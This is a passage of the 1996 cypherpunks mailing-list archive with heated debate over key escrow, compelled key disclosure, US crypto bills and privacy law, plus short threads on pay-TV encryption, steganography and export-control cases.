as far as Privacy protections and legislation.

In New Zealand, Hong Kong, the Nederlands, Taiwan, Hungary, most of the EC,
there is a well-defined privacy policy that protects - proactively - the
citizens from intrusive practives by government. Only here in the US do we
suffer under proposed/pending/established legislation such as the CDA. One
might argue that the few loopholes that the other nations allow for
"violations" of personal privacy are egregious (national security, etc),
but they represent the real-world concerns of governments not so
"insulated" by geography, etc as the US. The charge of "restraint" IMHO is
premature, and is more of a projection (in the psych sense) than a reality.

Canada, I've learned here at CFP, has defined a progressive national
privacy policy that proactively protects people -- where we do not
implicitly -- against "processing" of personal data for any purpose other
than a "specific use for which it was gathered. Does the US have such a
p-p-policy? No. Can you argue that other protections in place under the US
Constitution already cover those areas? You could, but there are so many
holes in that argument, and so much is yet to be done by the FTC, that we
now have the phenomenon of "toy" companies putting out 5-page survey web
pages for 5-year-olds that ask what careers they plan and what shoes they
wear. Amazing. I would not argue that myself.

Cypherpunks like Jim need to keep doing their homework before they make
such quasi-factual statements.

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 15:00:31 +0800
To: Adam philipp <adam@rosa.com>
Subject: Re: The limits of my patience. (suggested solution)
Message-ID: <m0u3BoG-0008ynC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:29 PM 3/30/96 -0800, Adam philipp wrote:
>At 09:48 AM 3/30/96 -0800, you wrote:
>>At 08:43 AM 3/30/96 -0500, Black Unicorn wrote:
>>>On Fri, 29 Mar 1996, jim bell wrote:
>>>> Explains a lot!   You _are_ paid for this.  In an earlier era, you would 
>>>> have gladly run the ovens at Auschwitz if you'd gotten paid for it.
>>>You're way out of line here.
>>>I expect an apology.
>>And as a form of protest, I recommend that you refuse to post any more 
>>messages to CP until you get it!  That would solve a lot of problems, I think.
>
>An apology was warranted. This is not a flaming ground.

It is also not the place for people like this Unicorn to waste our time with non-responsive messages.  If you don't know what I'm referring to, go back and re-read what I posted to him, and what he posted to me in "response."  You'll discover that he doesn't address my commentary appreciably, and certainly not reliably.  He's wasting your time, and mine, and if you haven't complained to him so far then you have no business complaining to me.

Put him to his proof;  challenge his assumptions.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 20:01:46 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u3BoI-0008ypC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:12 PM 3/30/96 -0500, Black Unicorn wrote:
>On Sat, 30 Mar 1996, jim bell wrote:
>
>> At 02:19 PM 3/30/96 -0500, Black Unicorn wrote:
>> >On Sat, 30 Mar 1996 JonWienke@aol.com wrote:
>
>> >> principals are still safe.  The escrow agent doesn't have to send any
>> >> encrypted "rosebud" message to anyone, and he can bend over backwards 
to make
>> >> the LEO's happy, so his butt is covered, too.  At this point, the 
LEO's can
>> >> either (a) send the keys to the NSA for decryption, and thereby admit 
that
>> >> the gov't can break IDEA (or whatever cryptosystem was used to encrypt 
the
>> >> keys before the escrow agent got them), (b) rubber hose the unencrypted
>> >> key(s) from the principal, or (c) go home and pout.
>> >
>> >(d) [which may be a subset of (b)] impose contempt sanctions on the 
>> >principal until he releases the key to the key.
>> 
>> ...which would be a clear violation of the 5th amendment,
>
>This is not at all clear. 

The ONLY reason this is "not at all clear" is because of those 9 
morons-for-life they have currently sitting in that wasted building near the 
Congress building have never been particularly careful to follow the rules.  

I believe that this would be a "clear violation of the 5th amendment."   
Whether those 9 nincompoops agree is still up in the air.  Given the fact 
that they were chosen for their current jobs after a long history of 
"getting along" with system, their "reliability" to hold the government's 
line is quite understandable.

>> Of course, you've also assumed that the escrowed data 
>> actually represents some sort of key, which it may not. (The data-holder is 
>> never told that the data he's asked to hold is REALLY a key!)  
>
>The data holder is ordered to turn over the data.  He does in this 
>scenerio, the data is encrypted,

Actually, he doesn't know this.  As long as the data being held "looks like" 
random data, and contains no headers, as far as anybody knows it IS random 
data.  The data holder cannot know.

 >LEO goes to the principal, principal 
>refuses to provide key for the encrypted key that the escrow agent was 
>holding, compelled discovery is ordered,

5th amendment is invoked.

> now your right back into the 
>case where the principal never gave the data to the escrow agent in the 
>first place.

What you seem to have forgotten is that if the scenario you describe could 
really occur "in real life," this is all the more reason for ordinary 
citizens to REFUSE to use any kind of key-escrow system, or to do so in a 
way which is completely undetectable.  Naturally, you won't address this 
problem, but the man-on-the-street is more realistic about his own privacy.  
How many times must I raise this issue?  How many times do you ignore it?  
Face it, people are smarter than you give them credit for.  They will simply 
not tolerate any more shit from the government.

Was the government lying to us when they claimed that "key escrow will be 
voluntary"?  Or was this some odd new usage of the word "voluntary" that 
only appears in the "Newspeak Dictionary"?

With every new post you send, you simply go to prove that every concern that 
anybody ever had about the government's behavior is potentially reasonable.  
You really ought to quit while you're behind.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 31 Mar 1996 20:02:11 +0800
To: cypherpunks@toad.com
Subject: Re: New crypto bill to be introduced
In-Reply-To: <m0u34m7-0008yEC@pacifier.com>
Message-ID: <6FkmLD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> At 11:35 AM 3/30/96 -0500, Declan B. McCullagh wrote:
> >A few responses to Jim Bell:
> >
> >* Why would Sen. Burns introduce *this* particular crypto bill? Would
> >you believe that he wanted to appear cyber-clueful and net-friendly, but
> >didn't know exactly how to do that -- so certain people suggested that
> >this bill would be an appropriate way to do it?
>
> I'm well aware of symbolic gestures.  Maybe this is one of them.  But having
> not seen it yet it's who knows how worthy it is.  I'm wondering when
> somebody is going to post it.  I'm also waiting for those people who claimed
> that the Leahy bill was dead (for lack-of-time reasons if nothing else) to
> express the same opinion of this newer bill.  Not that I want it dead; I
> just want to see if people are using consistent levels of logic.

This whole discussion of whether any of these laws will mean anything and which
bill deserves to be supported reminds me of the following story:

Once upon a time, the Tsar of Russia announced that he will hold elections to a
State Duma (parliament). Some Bolsheviks suggested that they should get their
candidates elected and try to introduce certain reform legislation. Others
suggested that the elections were a sham, they shouldn't waste their resources
taking part in them. Lenin said that both sides were wrong. The Duma was a sham
and they had no chance to pass any reform legislation. However they could use
the campaign process to get their message to the masses, and they could flame
the Tsar in the Duma if any of their candidates were elected. Of course,
everything that Lenin predicted came to pass. The Bolsheviks were able to
campaign and get some candidates elected, and they were able to say bad things
about the Tsar. However as soon as some non-Bolshevik left-wingers in the Duma
tried to pass some reform legislation, the Tsar disbanded it and had another
election, banning all potentially disloyal candidates from running.

And another story in the same vein: once a Chassidic businesman came to a rabbi
and asked the following question: "Rebbe, I'm about to get audited by the IRS.
Should I wear a business suit, so they'll think I'm a respectable person, or
should I wear rags, so they'll think I'm poor and can pay them nothing?"

Before the rabbi could answer, a young woman ran in and asked the following
question: "Rebbe, today I'm getting married. [Recall that in some societies
there's not supposed to be any sex before marriage.] On my wedding night,
should I go to bed wearing a nightgown or nothing?"

The rabbi said to the woman: "No matter how you dress, you'll get screwed."
And to the businessman: "And by the way, this also answers your question."

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 31 Mar 1996 20:02:42 +0800
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Test case for RSA t-shirts
In-Reply-To: <199603262347.LAA09880@cs26.cs.auckland.ac.nz>
Message-ID: <v03005b02ad836b9d5e5a@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:08 pm 3/30/96, Raph Levien wrote:
>   While we're on the subject, I called Sam Capino's office regarding my
>CJR for this t-shirt, and he said they were still waiting for a response
>from the NSA. I think my next move will be a letter asking exactly when
>I can expect a response, and whether there's anything I can do to compel
>a response, It was originally filed (in October) as a 15-day expedited
>review.

FYI, PRZ mentioned to me last night that the CJR on the OCR-able book of
PGP source is still pending. The "15 days" has stretched into about a year
in that case, if I don't have my dates/the facts wrong. Bob Prior at MIT
would know.

So much for expediency in commerce.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 20:01:57 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: Electronic locksmiths are watching you (Belgium's ban onPGP)
Message-ID: <m0u3CNo-0008xRC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:07 PM 3/30/96 -0500, Dave Del Torto wrote:
>At 1:25 am 3/30/96, jim bell wrote:
>[elided]
>>I think it's obvious that governments around the world have a very poor
>>record of responding "well" to encryption with any kind of acceptable
>>legislation.  Arguably, laws should exist for the benefit of the public, but
>>what's happening is that governments are using their authority to try to
>>restrain the political consequences of technical developments.  I see no
>>benefit to the public in laws against encryption, and certainly no net
>>benefit.
>>
>>We should be particularly suspicious of any hint of a pan-European ban or
>>control of encryption, because that is exactly the kind of development that
>>could usher in a secretly-negotiated treaty that might be argued to be
>>binding on the public.               [elided]
>
>IMHO, this represents a very America-centric, and a rather innacurate, view
>of the world. Sure, we live in a great country in many ways. Sure, we still
>enjoy many priviledges, such as owning and using strong crypto. In point of
>fact, though, the US is by far the most "behind" country in the wired world
>as far as Privacy protections and legislation.


You _COMPLETELY_ misinterpreted what I said.  I was referring, obliquely, to 
a tricky practice whereby the US government writes up a treaty, and pushes 
it through the Senate, requiring only 51 votes (or even less, depending on 
the quorum.  Participation of the House is not required, BTW, for treaty 
ratification.)  The resulting "treaty" is interpreted as being binding not 
merely on the government, but is also (and incorrectly, I believe)  on the 
citizens as well.  The reason, as I recall, is a misinterpretation of a 
portion of the Constitution which states that treaties are the law of the 
land.  The proper interpretion would be that such a treaty is indeed binding 
on the government, but not the citizenry who didn't sign it and whose 
Representatives didn't vote on it.  

The question is, "is it possible for the government to pass a law  that 
violates a citizen's constitutional rights by putting it into the form of an 
international treaty?"  In my opinion, this is unconstitutional, but sadly, 
I believe that this practice is nominally tolerated.  I believe there's at 
least one anti-narcotics treaty, in the 1960's,  which was foisted on the 
citizenry in this way.

Naturally, I welcome details and clarification by any REAL LAWYERS around 
here.  But if I'm right, the danger is that once Europe agrees on some sort 
of broad anti-crypto rule, all the US government needs to do to force such a 
rule on US citizens is to do their "write a treaty" schtick and we're all 
screwed.  It wouldn't _have_ to be Europe; but this would be the most 
convenient excuse they could dredge up.

>Cypherpunks like Jim need to keep doing their homework before they make
>such quasi-factual statements.

Cypherpunks like Dave need to pull their head out and read text carefully 
before responding to it.  If you really have no idea what I'm talking about, 
you need to do your research.

Jim Bell
jimbell@pacifier.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sun, 31 Mar 1996 15:01:25 +0800
To: cypherpunks@toad.com
Subject: Re: Why Americans feel no compulsion to learn foreign languages
Message-ID: <v02140b00ad8397d2fe2d@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:35 AM 3/30/96, Dr. Dimitri Vulis is rumored to have typed:
[...]
> No, I think both of Tim's statements illustrate the typical Americans disdain
> for learning for knowledge's sake and the (still amazing to me) ability to
> express pride in their ignorance.  [...] It's as if though
> their challenge is to go through life learning as little as they can get away
> with (other than obscure sports statistics).

Well, I believe that Tim's original point was that Americans have little
to gain in practical terms from learning foreign languages, while others
are forced by necessity to learn English (and possibly other languages.)
So far no one has provided any convincing counter-argument to this point.

As an American who has learned a great many languages just for the sake of
knowing them I can assure you that this knowledge has turned out to have no
practical benefit to me in my daily life.  I can converse in French, German,
Italian, Indonesian/Malay, and can "get around" in Tamil, Dutch, Russian, and
Arabic. I can read Latin, Greek, Sanskrit, and Egyptian hieroglyphics (okay,
so I was on a dead languages kick in college, sue me...) and know enough in
eight or nine other languages to travel anywhere in the world and be secure
in the knowledge that I could order dinner, read a train schedule, and find
shelter.  Big deal.  This knowledge is still of no practical benefit to me;
it does not help me do my job any better, it does not make my life
significantly better than Americans who are not polyglots, and in the past
year the only time I have had occasion to really use my linguistic abilities
was when I was able to deliver a particularly nasty reminder that some
Americans do speak more than just English to a pair of obnoxious French
ladies in the Los Altos Starbuck's coffee shop who seemed to think that if
the
natives cannot understand you then you have permission to make rude comments
about them loudly and in public...  For this ability I spent eight years in
class learning when to use the past subjunctive form of etre?!?

BTW, those who learn as little as they can get away with may not fit into your
ivory tower definition of true knowledge, but they are doing the important
thing: "getting away with it."  Every time I hear someone whine about
knowledge for its own sake I get the fealing they are just jealous because
they wasted time learning more knowledge than was necessary for the task
at hand... :)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Sun, 31 Mar 1996 20:01:43 +0800
To: perry@piermont.com
Subject: Re: [CRYPTO] Cable-TV-Piracy-Punks
In-Reply-To: <199603302117.QAA17076@jekyll.piermont.com>
Message-ID: <199603310256.SAA00348@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


The big latent assumption here being that you have only one-way
communication with the subscribers. DSS has a modem. It could get a new
key from a distribution center frequently - i.e. every day. Then the
pirates would somehow have to update their keys daily, in real time.
Once we have live packet communication (cable modems or ISDN D-channel,
for example) the keys can be changed minute by minute, if necessary.
Each new-key request is checked with a digital signature from the box's
key, and the KDC will not accept two requests for the same key. If you
clone the box, one or the other won't get a key. The pirates will have
to run their own network parallel to the legitimate one to distribute
the keys. Therefore piracy requires an ongoing organization, and is
subject to being tracked down.

						Mike

> Mike Duvos writes:
> > Once you have both audio and video streams in digital form,
> > having ones encryption "hacked" is more a function of
> > cluelessness on the part of those engineering the encryption and
> > authentication mechanism than some latent vulnerability on the
> > part of the technology.
> 
> Not true at all, Mike. Consider the threat model.
> 
> You have a single satelite sending out a single encrypted stream to
> millions of people. Your goal is to let some people view the signal
> and others not view the signal in spite of the fact that some of the
> people viewing the signal might be willing to leak information (such
> as the keys!) to the people who aren't supposed to view it.
> 
> In other words, you are trying to do something that no amount of
> technology can really do. At best, by using enough tamperproof
> equipment you can stave off the inevitable for a while.
> 
> Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peterson@bitterroot.net (Nels Peterson)
Date: Sun, 31 Mar 1996 20:02:00 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19960331020330843.AAA202@bitterroot.net>
MIME-Version: 1.0
Content-Type: text/plain


unsubscibe

-----------------------------------------------------------
peterson@bitterroot.net
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 20:02:36 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u3AZL-0008yEC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960330190621.25376O-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, jim bell wrote:

> At 02:19 PM 3/30/96 -0500, Black Unicorn wrote:
> >On Sat, 30 Mar 1996 JonWienke@aol.com wrote:

> >> principals are still safe.  The escrow agent doesn't have to send any
> >> encrypted "rosebud" message to anyone, and he can bend over backwards to make
> >> the LEO's happy, so his butt is covered, too.  At this point, the LEO's can
> >> either (a) send the keys to the NSA for decryption, and thereby admit that
> >> the gov't can break IDEA (or whatever cryptosystem was used to encrypt the
> >> keys before the escrow agent got them), (b) rubber hose the unencrypted
> >> key(s) from the principal, or (c) go home and pout.
> >
> >(d) [which may be a subset of (b)] impose contempt sanctions on the 
> >principal until he releases the key to the key.
> 
> ...which would be a clear violation of the 5th amendment,

This is not at all clear.  Infact, there is good evidence it goes the other 
way.

Mr. Bell, again, needs to learn law.
Seems even Nazis know it better than he.

> and would (by 
> informing the person targeted) defeat the entire purpose of getting the key 
> in the first place.

Considering by this time the encryped data would have been seized as 
evidence, I doubt this makes much difference.
Hey, call me a Nazi.


> Of course, you've also assumed that the escrowed data 
> actually represents some sort of key, which it may not. (The data-holder is 
> never told that the data he's asked to hold is REALLY a key!)  

The data holder is ordered to turn over the data.  He does in this 
scenerio, the data is encrypted, LEO goes to the principal, principal 
refuses to provide key for the encrypted key that the escrow agent was 
holding, compelled discovery is ordered, now your right back into the 
case where the principal never gave the data to the escrow agent in the 
first place.

In short, useless expense.
Very un-Nazi like.  Which is, of course, why I oppose it.


> Insisting that the target of an investigation provide something that may 
> not even exist is a sure way to fire up the populace.  Remember Madame 
> Defarge (sp?)

Ah yes, the final resort.  Grab the pitchforks and torches!
And he calls me a Nazi.
 
> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 31 Mar 1996 14:40:49 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
In-Reply-To: <199603302351.PAA03993@netcom14.netcom.com>
Message-ID: <199603310021.TAA17420@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> In the system I described, a person might make a lower bandwidth
> attempt to defeat the system by leaking either the periodically
> changing random session key used to encrypt the video stream, or
> the unique cryptographic key belonging to a particular smart card
> authorized to view the program.  We have postulated that the
> latter is not recoverable even by destructive reverse engineering
> of a specific card,

Why not? If the card knows its own key, then someone else can probably
get the key out by some nasty mechanism.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 31 Mar 1996 20:02:16 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <Pine.SUN.3.91.960330193440.5022B-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

has anyone had the sort of problem mentioned below?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: Sat, 30 Mar 1996 19:19 EDT
From: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
To: sandfort@crl.com
Subject: Re: A MODEST PROPOSAL

From:	IN%"sandfort@crl.com"  "Sandy Sandfort" 26-MAR-1996 16:57:18.92

>Wilco.  I'm collecting names for an addendum now.

	Thanks. Incidentally, I recently had a problem with posting to
the cypherpunks list; it consisted of the message getting sent to anon.penet.fi
instead. This looks like someone trying to find out anon.penet.fi anon IDs;
however, it wouldn't work due to the password requirement. Have you heard
anything about this? Please forward this to the list if you would; I can't
exactly do so myself until the problem is resolved. I've let Julf know via
the help address, but he hasn't gotten back to me yet - probably because I
sent it Friday.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 31 Mar 1996 20:01:39 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u3E6z-0008xXC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:56 PM 3/30/96 -0500, Black Unicorn wrote:

>> Actually, he doesn't know this.  As long as the data being held "looks 
like" 
>> random data, and contains no headers, as far as anybody knows it IS random 
>> data.  The data holder cannot know.
>
>I didn't say he had to know anything about whether the data was encrypted 
>or not.  I would point out that the data holder who is convinced I was 
>spending good money to store random bits would probably not be the data 
>holder I would pick to hold my data in the first place, but this is a 
>tangent, as knowing if the data is encrypted is irrelevent.
>But I'm sure my view is just a Nazified one.  In Bellville (Bellview?), 
>I'm sure everyone pays money to store megabytes of random data.


Justa sec!  "Megabytes of random data"?  Pardon me, but we're talking 
something which is alleged to be a KEY!  Perhaps you're too dense to follow 
this idea, but an IDEA key is 128 _bits_, and even a long RSA key is 2048 
bits, or only 256 bytes.  

So where did you get this "megabytes of random data" anyway?  Unfortunately, 
it appears that your brain is in neutral while your fingers are in 5th gear.

I don't suppose it would be particularly merciful at this point to mention 
steganography.  Unicorn is already vastly discredited as it is; I wouldn't 
want to be accused of rubbing it in, right?

Aw, why not.  He deserves it.  

Steganography is, basically, hiding data (usually already encrypted) in an 
existing file (often an audio file or a GIF) in such a way that it is 
undetectable.  The file it's hidden in, which is usually far larger (10x, 
100x, or even more) than the data to be hidden, is not appreciably changed 
by the process, and if it is well done the data is undetectable.  This means 
that if the picture is a 25,600 byte GIF of your late granny, which you are 
keeping for sentimental reasons, for every 99 bits of granny there is one 
bit of RSA key. Show the file to the judge, say "that's my late granny!" and 
he'll see that it is.  

Now, if you're operating according to your normal clueless level, you'll try 
to claim that the judge will fine the person ANYWAY.  Perhaps, but that 
merely goes to further justify my favorite method of dealing with these 
miscreants:  I work from what I consider a reasonable assumption that people 
shouldn't be obligated to tolerate shit from the government, and fining 
people on principle is an excellent example of the government going too far. 
 Only if you can demonstrate a reliable method of stopping this, permanently 
and rapidly, should anybody bother with your opinions.  Asking people to 
resort to "the political process" is probably what King George did for the 
American colonies 220 years ago.


>Easier said than done.  If you want to use this system, be my guest.
>Saying the Gestapo is a bad thing doesn't make it magically go away.

Sadly, saying Unicorn is clueless doesn't make him shut up, either.

>> Naturally, you won't address this 
>> problem, but the man-on-the-street is more realistic about his own privacy.  
>> How many times must I raise this issue?  How many times do you ignore it?  
>> Face it, people are smarter than you give them credit for.  They will simply 
>> not tolerate any more shit from the government.
>
>Funny, the latest primary has been one of the highest voter turn outs in 
>quite a while (except in Deleware).  Considering those are the law-and-order 
>types who are most likely to invade personal liberities, I think its a 
>bit hard to make the case that the temper of the country is anything but 
>very pro-political process.

Unicorn again displays his cluelessness.  

If people know that the system is sick, and they believe (even wrongly) that 
the only way to fix the problem is through "the political process,"  they 
can reasonably be expected to take one last, desperate effort at fixing the 
situation.  That doesn't make anybody "pro-political-process," in fact they 
could be disgusted with the lack of progress that this system produces.  
They simply believe that they have no alternative.

To put it in simple terms that even you should be able to understand, the 
fact that a drowning person moves his arms and legs around a lot doesn't 
mean that he LIKES to swim, it may merely mean that he likes drowning even 
less.


>Again, this will be my last posting on yet another thread.  Mr. Bell has 
>devolved again into ranting lunacy and that feedback loop that prevents 
>him from confining himself to the merits of the debate.

He's going to keep saying "this will be my last posting" whenever he grows 
tired of getting his butt kicked.  I guess that's the Unicorn equivalent of 
an EOF (end-of-file) character.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 31 Mar 1996 14:47:51 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u3BoI-0008ypC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960330203524.25376U-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 30 Mar 1996, jim bell wrote:

> At 07:12 PM 3/30/96 -0500, Black Unicorn wrote:

> >> >(d) [which may be a subset of (b)] impose contempt sanctions on the 
> >> >principal until he releases the key to the key.
> >> 
> >> ...which would be a clear violation of the 5th amendment,
> >
> >This is not at all clear. 
> 
> The ONLY reason this is "not at all clear" is because of those 9 
> morons-for-life they have currently sitting in that wasted building near the 
> Congress building have never been particularly careful to follow the rules.  

Yadda yadda yadda.

Mr. Bell the ultimate authority of the U.S. Constitution.  Spare me.
For someone so concerned about Nazis, you sure like centralized power.  
As long as everyone agrees with you, they can live.  Interesting.

(I also think its one of the most beautiful buildings in D.C.)

> I believe that this would be a "clear violation of the 5th amendment."   
> Whether those 9 nincompoops agree is sti

Yadda Yadda Yadda.

> >The data holder is ordered to turn over the data.  He does in this 
> >scenerio, the data is encrypted,
> 
> Actually, he doesn't know this.  As long as the data being held "looks like" 
> random data, and contains no headers, as far as anybody knows it IS random 
> data.  The data holder cannot know.

I didn't say he had to know anything about whether the data was encrypted 
or not.  I would point out that the data holder who is convinced I was 
spending good money to store random bits would probably not be the data 
holder I would pick to hold my data in the first place, but this is a 
tangent, as knowing if the data is encrypted is irrelevent.
But I'm sure my view is just a Nazified one.  In Bellville (Bellview?), 
I'm sure everyone pays money to store megabytes of random data.

>  >LEO goes to the principal, principal 
> >refuses to provide key for the encrypted key that the escrow agent was 
> >holding, compelled discovery is ordered,
> 
> 5th amendment is invoked.

See above.  Because you say the Fifth amendment is applicable doesn't 
make it so.  You are not the Supreme Court (thanks for small blessings and 
all that).  We aren't talking fantasy here, or might be, or would be, we 
are talking about is.  And the system you propose is problematic.

> > now your right back into the 
> >case where the principal never gave the data to the escrow agent in the 
> >first place.
> 
> What you seem to have forgotten is that if the scenario you describe could 
> really occur "in real life," this is all the more reason for ordinary 
> citizens to REFUSE to use any kind of key-escrow system, or to do so in a 
> way which is completely undetectable.

Well, all the more reason for you to REFUSE to pay your taxes, or to do 
so in a way which is completely undetectable.

Easier said than done.  If you want to use this system, be my guest.
Saying the Gestapo is a bad thing doesn't make it magically go away.

> Naturally, you won't address this 
> problem, but the man-on-the-street is more realistic about his own privacy.  
> How many times must I raise this issue?  How many times do you ignore it?  
> Face it, people are smarter than you give them credit for.  They will simply 
> not tolerate any more shit from the government.

Funny, the latest primary has been one of the highest voter turn outs in 
quite a while (except in Deleware).  Considering those are the law-and-order 
types who are most likely to invade personal liberities, I think its a 
bit hard to make the case that the temper of the country is anything but 
very pro-political process.

> Was the government lying to us when they claimed that "key escrow will be 
> voluntary"?  Or was this some odd new usage of the word "voluntary" that 
> only appears in the "Newspeak Dictionary"?

Actually, this usage of "voluntary" dates back something like 50 years.  
The speed limit example, where states "voluntarily" adopt speed limits 
(or suffer a revocation of funds so serious so as to put them in 
receivership) is a classic example.  But as Mr. Bell is too busy looking 
for Nazis, he wasn't doing his homework and so missed this.

His bravado is a poor replacement for basic education.  It's not even 
very good bravado.
 
> With every new post you send, you simply go to prove that every concern that 
> anybody ever had about the government's behavior is potentially reasonable.  
> You really ought to quit while you're behind.

I've never made the case for anything but exactly this.  If I thought 
government behavior was reasonable, I'd not bother posting at all.  I 
just don't call people Nazis and call for murder for hire to solve the 
problem.  That's the resort of infantile mind.  The mind that fills gaps 
with ranting and violence where mental effort is too much of a task.

Again, this will be my last posting on yet another thread.  Mr. Bell has 
devolved again into ranting lunacy and that feedback loop that prevents 
him from confining himself to the merits of the debate.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@unix.ka9q.ampr.org>
Date: Sun, 31 Mar 1996 20:08:24 +0800
To: cypherpunks@toad.com
Subject: text of Richey's decision
Message-ID: <199603310546.VAA08153@unix.ka9q.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


The text of Judge Richey's decision to grant the government's motion
to dismiss my case is now up on my web page as

http://www.qualcomm.com/people/pkarn/export/decision.html

My attorneys scanned it into HTML format, but neither they nor I have
had a chance to thoroughly proofread it yet.

An appeal is extremely likely.

Phil





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 31 Mar 1996 20:02:09 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD UpDate
In-Reply-To: <199603301639.IAA16075@netcom9.netcom.com>
Message-ID: <Pine.LNX.3.92.960330214919.1625A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 30 Mar 1996, Bill Frantz wrote:

> At  8:36 PM 3/28/96 +0100, JR@ns.cnb.uam.es wrote:
> >        I may -or not- trust the people at unimi, but would I also trust
> >a lot of intermediate people putting up together a CD-ROM? For that sake,
> >and considering the costs of storage and removable storage media, I'd
> >bet many people would find more useful to download their copies from
> >the net (even once a year only) as I did.
>
> If pieces of the source/executable are digitally signed, you have a basis
> for some degree of trust.  (My pgp came with a detached signature.  A bit
> self-referental, but at least a start.)

It depends where the person who signed the program is in the web of trust.
I rarely find that the cooresponding public key for a digital signature is
signed by someone that I trust and that I know that that public key belongs
to whom it says it belongs.  Without trust, a digital signature is completely
worthless.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMV3zobZc+sv5siulAQHHgAQAqBcay46jx0/ez+Cz1vsjZjpWacurf3II
